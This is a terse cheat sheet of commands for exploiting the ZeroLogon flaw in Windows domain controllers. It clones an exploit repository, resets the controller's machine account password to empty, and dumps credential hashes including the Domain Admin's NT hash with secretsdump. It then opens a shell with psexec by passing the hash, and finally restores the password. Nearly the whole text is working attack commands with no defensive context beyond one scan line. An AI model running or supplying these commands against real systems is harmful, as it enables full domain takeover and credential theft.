ZeroLogon

git clone https://github.com/risksense/zerologon/
cd zerologon

python3 set_empty_pw.py  <netbios_dc_name> <dc_ip>

# secretsdump to retrieve a user hash
secretsdump -no-pass'<DOMAIN>/<DC NAME>$@<DC_IP>'

# Get a shell with a user
psexec.py -hashes :<nt_hash> <DOMAIN>/Administrator@<DC_IP>

# Scan for the vulnerability
zerologon-scan 'DC_name' 'DC_IP_address'

# Exploit the vulnerability: set the NT hash to \x00*8
zerologon-exploit 'DC_name' 'DC_IP_address'

# Obtain the Domain Admin's NT hash
secretsdump -no-pass 'Domain'/'DC_computer_account$'@'Domain_controller'

# Obtain the machine account hex encoded password with the domain admin credentials
secretsdump -hashes :'NThash' 'Domain'/'Domain_admin'@'Domain_controller'

# Restore the machine account password
zerologon-restore 'Domain'/'DC_account'@'Domain_controller' -target-ip 'DC_IP_address' -hexpass 'DC_hexpass'